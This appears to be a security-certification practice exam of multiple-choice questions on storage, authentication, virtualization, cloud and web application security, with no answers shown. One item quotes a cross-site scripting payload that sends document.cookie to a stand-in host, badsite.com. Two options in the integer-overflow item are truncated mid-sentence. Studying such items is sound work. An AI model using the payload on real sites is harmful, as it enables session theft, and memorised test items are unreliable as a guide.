Test

An administrator wants to enable policy based flexible mandatory access controls on an open source OS to prevent abnormal application modifications or executions.
 
Which of the following would BEST accomplish this?
Access control lists
SELinux
IPtables firewall
HIPS
Company ABC’s SAN is nearing capacity, and will cause costly downtimes if servers run out of disk space.
 
Which of the following is a more cost effective alternative to buying a new SAN?
 
Enable multipath to increase availability
Enable deduplication on the storage pools
Implement snapshots to reduce virtual disk size
Implement replication to offsite datacenter
A systems administrator establishes a CIFS share on a UNIX device to share data to Windows systems. The security authentication on the Windows domain is set to the highest level. Windows users are stating that they cannot authenticate to the UNIX share.
 
Which of the following settings on the UNIX server would correct this problem?
Refuse LM and only accept NTLMv2
Accept only LM
Refuse NTLMv2 and accept LM
Accept only NTLM
A security architect is designing a new infrastructure using both type 1 and type 2 virtual machines. In addition to the normal complement of security controls (e.g. antivirus, host hardening, HIPS/NIDS) the security architect needs to implement a mechanism to securely store cryptographic keys used to sign code and code modules on the VMs.
 
Which of the following will meet this goal without requiring any hardware pass-through implementations?
VTPM
HSM
TPM
INE
A user has a laptop configured with multiple operating system installations. The operating systems are all installed on a single SSD, but each has its own partition and logical volume.
 
Which of the following is the BEST way to ensure confidentiality of individual operating system data?
Encryption of each individual partition
Encryption of the SSD at the file level
FDE of each logical volume on the SSD
FDE of the entire SSD as a single disk
After being notified of an issue with the online shopping cart, where customers are able to arbitrarily change the price of listed items, a programmer analyzes the following piece of code used by a web based shopping cart.
 
SELECT ITEM FROM CART WHERE ITEM=ADDSLASHES($USERINPUT);
 
The programmer found that every time a user adds an item to the cart, a temporary file is created on the web server /tmp directory. The temporary file has a name which is generated by concatenating the content of the $USERINPUT variable and a timestamp in the form of MMDDYYYY, (e.g. smartphone-12-25-2013.tmp) containing the price of the item being purchased.
 
Which of the following is MOST likely being exploited to manipulate the price of a shopping cart’s items?
Input validation
SQL injection
TOCTOU
Session hijacking
The administrator is troubleshooting availability issues on an FCoE-based storage array that uses deduplication. The single controller in the storage array has failed, so the administrator wants to move the drives to a storage array from a different manufacturer in order to access the data.
 
Which of the following issues may potentially occur?
The data may not be in a usable format.
The new storage array is not FCoE based.
The data may need a file system check.
The new storage array also only has a single controller.
Joe, a hacker, has discovered he can specifically craft a webpage that when viewed in a browser crashes the browser and then allows him to gain remote code execution in the context of the victim’s privilege level. The browser crashes due to an exception error when a heap memory that is unused is accessed.
 
Which of the following BEST describes the application issue?
Integer overflow
Click-jacking
Race condition
SQL injection
Use after free
Input validation
A developer is determining the best way to improve security within the code being developed. The developer is focusing on input fields where customers enter their credit card details.
 
Which of the following techniques, if implemented in the code, would be the MOST effective in protecting the fields from malformed input?
Client side input validation
Stored procedure
Encrypting credit card details
Regular expression matching
A penetration tester is assessing a mobile banking application. Man-in-the-middle attempts via an HTTP intercepting proxy are failing with SSL errors.
 
Which of the following controls has likely been implemented by the developers?
SSL certificate revocation
SSL certificate pinning
Mobile device root-kit detection
Extended Validation certificates
A system administrator needs to meet the maximum amount of security goals for a new DNS infrastructure. The administrator deploys DNSSEC extensions to the domain names and infrastructure.
 
Which of the following security goals does this meet? (Select TWO).
Availability
Authentication
Integrity
Confidentiality
Encryption
The risk manager is reviewing a report which identifies a requirement to keep a business critical legacy system operational for the next two years. The legacy system is out of support because the vendor and security patches are no longer released. Additionally, this is a proprietary embedded system and little is documented and known about it.
 
Which of the following should the Information Technology department implement to reduce the security risk from a compromise of this system?
 
Virtualize the system and migrate it to a cloud provider.
Segment the device on its own secure network.
Install an antivirus and HIDS on the system.
Hire developers to reduce vulnerabilities in the code.
An organization would like to allow employees to use their network username and password to access a third-party service. The company is using Active Directory Federated Services for their directory service.
 
Which of the following should the company ensure is supported by the third party? (Select TWO).
LDAP/S
SAML
NTLM
OAUTH
Kerberos
An extensible commercial software system was upgraded to the next minor release version to patch a security vulnerability. After the upgrade, an unauthorized intrusion into the system was detected. The software vendor is called in to troubleshoot the issue and reports that all core components were updated properly.
 
Which of the following has been overlooked in securing the system? (Select TWO).
The company’s IDS signatures were not updated.
The company’s custom code was not patched.
The patch caused the system to revert to http.
The software patch was not cryptographically signed.
The wrong version of the patch was used.
Third-party plug-ins were not patched.
A forensic analyst works for an e-discovery firm where several gigabytes of data are processed daily. While the business is lucrative, they do not have the resources or the scalability to adequately serve their clients.
 
Since it is an e-discovery firm where chain of custody is important, which of the following scenarios should they consider?
Offload some data processing to a public cloud
Aligning their client intake with the resources available
Using a community cloud with adequate controls
Outsourcing the service to a third party cloud provider
A company is deploying a new iSCSI-based SAN.
 
The requirements are as follows:
 - SAN nodes must authenticate each other.
 - Shared keys must NOT be used.
 - Do NOT use encryption in order to gain performance.
 
Which of the following design specifications meet all the requirements? (Select TWO).
 
Targets use CHAP authentication
IPSec using AH with PKI certificates for authentication
Fiber channel should be used with AES
Initiators and targets use CHAP authentication
Fiber channel over Ethernet should be used
IPSec using AH with PSK authentication and 3DES
Targets have SCSI IDs for authentication
Company XYZ provides hosting services for hundreds of companies across multiple industries including healthcare, education, and manufacturing. The security architect for company XYZ is reviewing a vendor proposal to reduce company XYZ’s hardware costs by combining multiple physical hosts through the use of virtualization technologies. The security architect notes concerns about data separation, confidentiality, regulatory requirements concerning PII, and administrative complexity on the proposal.
 
Which of the following BEST describes the core concerns of the security architect?
 
Most of company XYZ’s customers are willing to accept the risks of unauthorized disclosure and access to information by outside users.
The availability requirements in SLAs with each hosted customer would have to be re-written to account for the transfer of virtual machines between physical platforms for regular maintenance.
Company XYZ could be liable for disclosure of sensitive data from one hosted customer when accessed by a malicious user who has gained access to the virtual machine of another hosted customer.
Not all of company XYZ’s customers require the same level of security and the administrative complexity of maintaining multiple security postures on a single hypervisor negates hardware cost savings
A university requires a significant increase in web and database server resources for one week, twice a year, to handle student registration. The web servers remain idle for the rest of the year.
 
Which of the following is the MOST cost effective way for the university to securely handle student registration?
Virtualize the web servers locally to add capacity during registration.
Move the database servers to an elastic private cloud while keeping the web servers local.
Move the database servers and web servers to an elastic private cloud.
Move the web servers to an elastic public cloud while keeping the database servers local.
Due to a new regulatory requirement, ABC Company must now encrypt all WAN transmissions. When speaking with the network administrator, the security administrator learns that the existing routers have the minimum processing power to do the required level of encryption.
 
Which of the following solutions minimizes the performance impact on the router?
Deploy inline network encryption devices
Install an SSL acceleration appliance
Require all core business applications to use encryption
Add an encryption module to the router and configure IPSec
A security administrator was doing a packet capture and noticed a system communicating with an unauthorized address within the 2001::/32 prefix. The network administrator confirms there is no IPv6 routing into or out of the network.
 
Which of the following is the BEST course of action?
Investigate the network traffic and block UDP port 3544 at the firewall
Remove the system from the network and disable IPv6 at the router
Locate and remove the unauthorized 6to4 relay from the network
Disable the switch port and block the 2001::/32 traffic at the firewall
In order to reduce costs and improve employee satisfaction, a large corporation is creating a BYOD policy. It will allow access to email and remote connections to the corporate enterprise from personal devices; provided they are on an approved device list.
 
Which of the following security measures would be MOST effective in securing the enterprise under the new policy? (Select TWO).
Provide free email software for personal devices.
Encrypt data in transit for remote access.
Require smart card authentication for all devices.
Implement NAC to limit insecure devices access.
Enable time of day restrictions for personal devices.
A security administrator is tasked with implementing two-factor authentication for the company VPN. The VPN is currently configured to authenticate VPN users against a backend RADIUS server. New company policies require a second factor of authentication, and the Information Security Officer has selected PKI as the second factor.
 
Which of the following should the security administrator configure and implement on the VPN concentrator to implement the second factor and ensure that no error messages are displayed to the user during the VPN connection? (Select TWO).
The user’s certificate private key must be installed on the VPN concentrator.
The CA’s certificate private key must be installed on the VPN concentrator.
The user certificate private key must be signed by the CA.
The VPN concentrator’s certificate private key must be signed by the CA and installed on the VPN concentrator
The VPN concentrator’s certificate private key must be installed on the VPN concentrator.
The CA’s certificate public key must be installed on the VPN concentrator.
Ann, a software developer, wants to publish her newly developed software to an online store. Ann wants to ensure that the software will not be modified by a third party or end users before being installed on mobile devices.
 
Which of the following should Ann implement to stop modified copies of her software from running on mobile devices?
Single sign-on
Identity propagation
Remote attestation
Secure code review
Two separate companies are in the process of integrating their authentication infrastructure into a unified single sign-on system. Currently, both companies use an AD backend and two factor authentication using TOTP. The system administrators have configured a trust relationship between the authentication backends to ensure proper process flow.
 
How should the employees request access to shared resources before the authentication integration is complete?
 
They should logon to the system using the username concatenated with the 6-digit code and their original password.
They should logon to the system using the newly assigned global username: first.lastname#### where #### is the second factor code.
They should use the username format: LAN\first.lastname together with their original password and the next 6-digit code displayed when the token button is depressed.
They should use the username format: first.lastname@company.com, together with a password and their 6-digit code.
An industry organization has implemented a system to allow trusted authentication between all of its partners. The system consists of a web of trusted RADIUS servers communicating over the Internet. An attacker was able to set up a malicious server and conduct a successful man-in-the-middle attack.
 
Which of the following controls should be implemented to mitigate the attack in the future?
Use PAP for secondary authentication on each RADIUS server
Disable unused EAP methods on each RADIUS server
Enforce TLS connections between RADIUS servers
Use a shared secret for each pair of RADIUS servers
Joe, the Chief Executive Officer (CEO), was an Information security professor and a Subject Matter Expert for over 20 years. He has designed a network defense method which he says is significantly better than prominent international standards. He has recommended that the company use his cryptographic method.
 
Which of the following methodologies should be adopted?
 
The company should develop an in-house solution and keep the algorithm a secret.
The company should use the CEO’s encryption scheme.
The company should use a mixture of both systems to meet minimum standards.
The company should use the method recommended by other respected information security organizations.
 
Which of the following BEST constitutes the basis for protecting VMs from attacks from other VMs hosted on the same physical platform?
Aggressive patch management on the host and guest OSs.
Host based IDS sensors on all guest OSs.
Different antivirus solutions between the host and guest OSs.
Unique Network Interface Card (NIC) assignment per guest OS.
Two universities are making their 802.11n wireless networks available to the other university’s students. The infrastructure will pass the student’s credentials back to the home school for authentication via the Internet.
 
The requirements are:
 
 - Mutual authentication of clients and authentication server
 - The design should not limit connection speeds
 - Authentication must be delegated to the home school
 - No passwords should be sent unencrypted
 
The following design was implemented:
 
 - WPA2 Enterprise using EAP-PEAP-MSCHAPv2 will be used for wireless security
 - RADIUS proxy servers will be used to forward authentication requests to the home school
 - The RADIUS servers will have certificates from a common public certificate authority
 - A strong shared secret will be used for RADIUS server authentication
 
Which of the following security considerations should be added to the design?
The transport layer between the RADIUS servers should be secured
WPA Enterprise should be used to decrease the network overhead
The RADIUS servers should have local accounts for the visiting students
Students should be given certificates to use for authentication to the network
A company with 2000 workstations is considering purchasing a HIPS to minimize the impact of a system compromise from malware. Currently, the company projects a total cost of $50,000 for the next three years responding to and eradicating workstation malware. The Information Security Officer (ISO) has received three quotes from different companies that provide HIPS.
 
The first quote requires a $10,000 one-time fee, annual cost of $6 per workstation, and a 10% annual support fee based on the number of workstations.
 
The second quote requires a $15,000 one-time fee, an annual cost of $5 per workstation, and a 12% annual fee based on the number of workstations.
 
The third quote has no one-time fee, an annual cost of $8 per workstation, and a 15% annual fee based on the number of workstations.
 
Which solution should the company select if the contract is only valid for three years?
 
First quote
Second quote
Third quote
Accept the risk
Customers are receiving emails containing a link to malicious software. These emails are subverting spam filters. The email reads as follows:
 
Delivered-To: customer@example.com
Received: by 10.14.120.205 Mon, 1 Nov 2010 11:15:24 -0700 (PDT)
Received: by 10.231.31.193 Mon, 01 Nov 2010 11:15:23 -0700 (PDT)
Return-Path: <IT@company.com>
Received: from 127.0.0.1 for <customer@example.com>; Mon, 1 Nov 2010 13:15:14 -0500 (envelope-from <IT@company.com>)
Received: by smtpex.example.com (SMTP READY) with ESMTP (AIO); Mon, 01 Nov 2010 13:15:14 -0500
Received: from 172.18.45.122 by 192.168.2.55; Mon, 1 Nov 2010 13:15:14 -0500
From: Company <IT@Company.com>
To: "customer@example.com" <customer@example.com>
Date: Mon, 1 Nov 2010 13:15:11 -0500
Subject: New Insurance Application
Thread-Topic: New Insurance Application
 
Please download and install software from the site below to maintain full access to your account.
 
 
________________________________
 
Additional information:
The authorized mail servers IPs are 192.168.2.10 and 192.168.2.11.
The network’s subnet is 192.168.2.0/25.
 
Which of the following are the MOST appropriate courses of action a security administrator could take to eliminate this risk? (Select TWO).
 
Identify the origination point for malicious activity on the unauthorized mail server.
Block port 25 on the firewall for all unauthorized mail servers.
Disable open relay functionality.
Shut down the SMTP service on the unauthorized mail server.
Enable STARTTLS on the spam filter.
A security administrator notices the following line in a server's security log:
 
<input name='credentials' type='TEXT' value='" + request.getParameter('><script>document.location='http://badsite.com/?q='document.cookie</script>') + "';
 
The administrator is concerned that it will take the developer a lot of time to fix the application that is running on the server.
 
Which of the following should the security administrator implement to prevent this particular attack?
 
WAF
Input validation
SIEM
Sandboxing
DAM
A web developer is responsible for a simple web application that books holiday accommodations. The front-facing web server offers an HTML form, which asks for a user’s age. This input gets placed into a signed integer variable and is then checked to ensure that the user is in the adult age range.
 
Users have reported that the website is not functioning correctly. The web developer has inspected log files and sees that a very large number (in the billions) was submitted just before the issue started occurring.
 
Which of the following is the MOST likely situation that has occurred?
 
The age variable stored the large number and filled up disk space which stopped the
The age variable has had an integer overflow and was assigned a very small negative number
Computers are able to store numbers well above “billions” in size. Therefore, the website
The application has crashed because a very large integer has led to a “divide by zero”.
A company has decided to change its current business direction and refocus on core business. Consequently, several company sub-businesses are in the process of being sold-off. A security consultant has been engaged to advise on residual information security concerns with a demerger.
 
From a high-level perspective, which of the following BEST provides the procedure that the consultant should follow?
Perform a penetration test for the current state of the company. Perform another penetration test after the de-merger. Identify the gaps between the two tests.
Duplicate security-based assets should be sold off for commercial gain to ensure that the security posture of the company does not decline.
Explain that security consultants are not trained to offer advice on company acquisitions or demergers. This needs to be handled by legal representatives well versed in corporate law.
Identify the current state from a security viewpoint. Based on the demerger, assess what the security gaps will be from a physical, technical, DR, and policy/awareness perspective.
It has come to the IT administrator’s attention that the “post your comment” field on the company blog page has been exploited, resulting in cross-site scripting attacks against customers reading the blog.
 
Which of the following would be the MOST effective at preventing the “post your comment” field from being exploited?
 
Update the blog page to HTTPS
Filter metacharacters
Install HIDS on the server
Patch the web application
Perform client side input validation
A business unit of a large enterprise has outsourced the hosting and development of a new external website which will be accessed by premium customers, in order to speed up the time to market timeline.
 
Which of the following is the MOST appropriate?
The external party providing the hosting and website development should be obligated under contract to provide a secure service which is regularly tested (vulnerability and penetration). SLAs should be in place for the resolution of newly identified vulnerabilities and a guaranteed uptime.
The use of external organizations to provide hosting and web development services is not recommended as the costs are typically higher than what can be achieved internally. In addition, compliance with privacy regulations becomes more complex and guaranteed uptimes are difficult to track and measure.
 
Outsourcing transfers all the risk to the third party. An SLA should be in place for the resolution of newly identified vulnerabilities and penetration / vulnerability testing should be conducted regularly.
 
Outsourcing transfers the risk to the third party, thereby minimizing the cost and any legal obligations. An MOU should be in place for the resolution of newly identified vulnerabilities and penetration / vulnerability testing should be conducted regularly.
 
An administrator is tasked with securing several website domains on a web server. The administrator elects to secure www.example.com, mail.example.org, archive.example.com, and www.example.org with the same certificate.
 
Which of the following would allow the administrator to secure those domains with a single issued certificate?
 
Intermediate Root Certificate
Wildcard Certificate
EV x509 Certificate
Subject Alternative Names Certificate
An administrator wishes to replace a legacy clinical software product as it has become a security risk. The legacy product generates $10,000 in revenue a month. The new software product has an initial cost of $180,000 and a yearly maintenance of $2,000 after the first year. However, it will generate $15,000 in revenue per month and be more secure.
 
How many years until there is a return on investment for this new package?
 
1
2
3
4
A large company is preparing to merge with a smaller company. The smaller company has been very profitable, but the smaller company’s main applications were created in-house.
 
Which of the following actions should the large company’s security administrator take in preparation for the merger?
 
A review of the mitigations implemented from the most recent audit findings of the smaller company should be performed.
An ROI calculation should be performed to determine which company's application should be used.
A security assessment should be performed to establish the risks of integration or co-existence.
A regression test should be performed on the in-house software to determine security risks associated with the software.
Which of the following technologies prevents an unauthorized HBA from viewing iSCSI target information?
 
Deduplication
Data snapshots
LUN masking
Storage multipaths
Company ABC is hiring customer service representatives from Company XYZ. The representatives reside at Company XYZ’s headquarters.
 
Which of the following BEST prevents Company XYZ representatives from gaining access to unauthorized Company ABC systems?
 
Require each Company XYZ employee to use an IPSec connection to the required systems
Require Company XYZ employees to establish an encrypted VDI session to the required systems
Require Company ABC employees to use two-factor authentication on the required systems
Require a site-to-site VPN for intercompany communications
A Chief Information Security Officer (CISO) has requested that a SIEM solution be implemented. The CISO wants to know upfront what the projected TCO would be before looking further into this concern.
 
Two vendor proposals have been received:
 
Vendor A:
 - product-based solution which can be purchased by the pharmaceutical company.
 - Capital expenses to cover central log collectors, correlators, storage and management consoles expected to be $150,000.
 - Operational expenses are expected to be a 0.5 full time employee (FTE) to manage the solution, and 1 full time employee to respond to incidents per year.
 
Vendor B:
 - managed service-based solution which can be the outsourcer for the pharmaceutical company’s needs.
 - Bundled offering expected to be $100,000 per year.
 - Operational expenses for the pharmaceutical company to partner with the vendor are expected to be a 0.5 FTE per year.
 - Internal employee costs are averaged to be $80,000 per year per FTE.
 
Based on calculating TCO of the two vendor proposals over a 5 year period, which of the following options is MOST accurate?
 
Based on cost alone, having an outsourced solution appears cheaper.
Based on cost alone, having an outsourced solution appears to be more expensive.
Based on cost alone, both outsourced and in-sourced solutions appear to be the same.
Based on cost alone, having a purchased product solution appears cheaper.
A popular commercial virtualization platform allows for the creation of virtual hardware. To virtual machines, this virtual hardware is indistinguishable from real hardware.
 
By implementing virtualized TPMs, which of the following trusted system concepts can be implemented?
 
Software-based root of trust
Continuous chain of trust
Chain of trust with a hardware root of trust
Software-based trust anchor with no root of trust
A port in a fibre channel switch failed, causing a costly downtime on the company’s primary website.
 
Which of the following is the MOST likely cause of the downtime?
 
The web server iSCSI initiator was down.
The web server was not multipathed.
The SAN snapshots were not up-to-date.
The SAN replication to the backup site failed.
An internal development team has migrated away from Waterfall development to use Agile development. Overall, this has been viewed as a successful initiative by the stakeholders as it has improved time-to-market. However, some staff within the security team have contended that Agile development is not secure.
 
Which of the following is the MOST accurate statement?
 
Agile and Waterfall approaches have the same effective level of security posture. They both need similar amounts of security effort at the same phases of development.
Agile development is fundamentally less secure than Waterfall due to the lack of formal up-front design and inability to perform security reviews.
Agile development is more secure than Waterfall as it is a more modern methodology which has the advantage of having been able to incorporate security best practices of recent years.
Agile development has different phases and timings compared to Waterfall. Security activities need to be adapted and performed within relevant Agile phases.
A vulnerability scanner report shows that a client-server host monitoring solution operating in the credit card corporate environment is managing SSL sessions with a weak algorithm which does not meet corporate policy.
 
Which of the following are true statements? (Select TWO).
 
The X509 V3 certificate was issued by a non trusted public CA.
The client-server handshake could not negotiate strong ciphers.
The client-server handshake is configured with a wrong priority.
The client-server handshake is based on TLS authentication.
The X509 V3 certificate is expired.
The client-server implements client-server mutual authentication with different certificates.
Which of the following represents important technical controls for securing a SAN storage infrastructure? (Select TWO).
Synchronous copy of data
RAID configuration
Data de-duplication
Storage pool space allocation
Port scanning
LUN masking/mapping
Port mapping
An enterprise must ensure that all devices that connect to its networks have been previously approved. The solution must support dual factor mutual authentication with strong identity assurance. In order to reduce costs and administrative overhead, the security architect wants to outsource identity proofing and second factor digital delivery to the third party.
 
Which of the following solutions will address the enterprise requirements?
 
Implementing federated network access with the third party.
Using a HSM at the network perimeter to handle network device access.
Using a VPN concentrator which supports dual factor via hardware tokens.
Implementing 802.1x with EAP-TTLS across the infrastructure.